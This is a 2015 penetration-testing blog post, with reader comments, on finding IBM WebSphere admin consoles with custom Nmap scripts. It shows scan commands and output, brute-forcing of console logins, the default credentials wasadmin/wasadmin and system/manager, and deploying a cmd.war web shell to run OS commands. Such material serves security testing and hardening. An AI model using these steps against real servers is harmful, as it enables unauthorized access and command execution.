Identifying and exploiting IBM WebSphere Application Server

IBM WebSphere is application server similar to Tomcat, JBoss and WebLogic. Therefore, it should be interesting to any penetration tester doing enterprise scale work where Websphere might be present. It should be also interesting to anyone who is working on securing enterprise environment since Websphere allows deploying own (malicious or not) code to the server.

I have written NSE scripts to identify IBM Websphere consoles of application servers and to brute force any usernames and passwords. I will also demonstrate basics of WebSphere exploitation.

In order to identify WebSphere consoles you will need NSEs available at https://github.com/kost/nmap-nse and you can clone git repository with following command:

git clone https://github.com/kost/nmap-nse.git
cd nmap-nse/scripts

I have submitted scripts for Nmap inclusion, but until scripts are not part of the Nmap you will have to download them from the repository above. Once NSE script is available, running nmap with WebSphere NSE script is simple:

nmap -p- -sV -sT --script=./http-websphere-console.nse 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 05:49 CEST
Nmap scan report for 172.17.0.1
Host is up (0.000049s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
28000/tcp open http IBM Tivoli Enterprise Portal (Servlet 3.0)
28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console:
| consoles:
|_ WebSphere at /ibm/console/logon.jsp?action=OK
28002/tcp open giop CORBA naming service
28003/tcp open ssl/http IBM WebSphere Application Server 8.0
|_http-server-header: WebSphere Application Server/8.0
28006/tcp open ssl/giop CORBA naming service
28007/tcp open ssl/unknown
28008/tcp open giop CORBA naming service
28009/tcp open unknown
28010/tcp open ssl/unknown
28020/tcp open ssl/unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds

As you can see from the port scan, NSE script identified WebSphere console available at URI: /ibm/console/logon.jsp?action=OK

If you go to that URI, you will be welcomed with username and password:

IBM WebSphere Console

IBM WebSphere Console

As you can see this is standard IBM WebSphere application server console. So, I have made another NSE script http-websphere-console-brute.nse which can help you with guessing username and password. Usage is simple:


nmap -p28001 -sV -sT --script=./http-websphere-console-brute.nse --script-args 'userdb=users.txt,passdb=passwd.txt' 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 06:30 CEST
Nmap scan report for 172.17.0.1
Host is up (0.00011s latency).
PORT STATE SERVICE VERSION
28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console-brute:
| Accounts:
| wasadmin:wasadmin – Valid credentials
|_ Statistics: Performed 1 guesses in 1 seconds, average tps: 1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.76 seconds

As you can see NSE script guessed IBM WebSphere credentials: username wasadmin with password wasadmin. Another good credential to try is username system with password manager.

After successful username/password guess you can login to the console:

IBM WebSphere Console Login

IBM WebSphere Console Login

After successful login to the console, you can configure application server, install and deploy application. In case of attacker, usually that would consists of deploying cmd.war in order to execute operating system commands:

Deploy cmd.war in IBM Websphere Console

Deploy cmd.war in IBM Websphere Console

Next step would be going to cmd.war application URL and executing operating system commands. But, I guess you know how to go from here: it is simple and same with any application server.

References and further links

GitHub page:
https://github.com/kost/nmap-nse

Nmap-dev post:
http://seclists.org/nmap-dev/2015/q3/73

In this blog post, I have demonstrated basics of WebSphere exploitation. After this, I think you’re ready to explore following URLs:

http://erpscan.com/wp-content/uploads/pub/Penetration%20from%20application%20down%20to%20OS%20(IBM%20Websphere).pdf

http://www.securitytube.net/video/3298

Good luck with your IBM WebSphere adventures!

Advertisements

4 Responses to Identifying and exploiting IBM WebSphere Application Server

  1. You definitely should include a default username/password list. IBM uses WAS as a base for several solutions, which by default have several distinctively named (wpsbind, wpsadmin, etc) administrative account names.

    Also, brute force searching for web application context roots might be worthwhile. You might find one servlet or something similar that might not require authentication to function. The search space is somewhat large, but that’s something you could happily brute force slow and somewhat quiet for months…

    AFAIK WAS was originally based on Apache Geronimo, but IBM has apparently stopped supporting the project a few years ago.

    • Josh says:

      I agree on the first point. A list of common Web sphere credentials would be handy to include. I liked through the git hub repository and couldn’t find it.

    • k0st says:

      Hello and thanks for your comment. If you already have some kind of list to start it, you’re more than welcome to send it over to me. Proper credits will be given, of course 😉
      Same with context roots.

      Anyway, this is introductory post to the websphere. I hope I will have time to build up on this in the future (as time allows it) in order to provide more tips about checking security of WAS.

  2. Pingback: Weekendowa Lektura 2015-07-17 – ponad pół setki linków | Zaufana Trzecia Strona

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: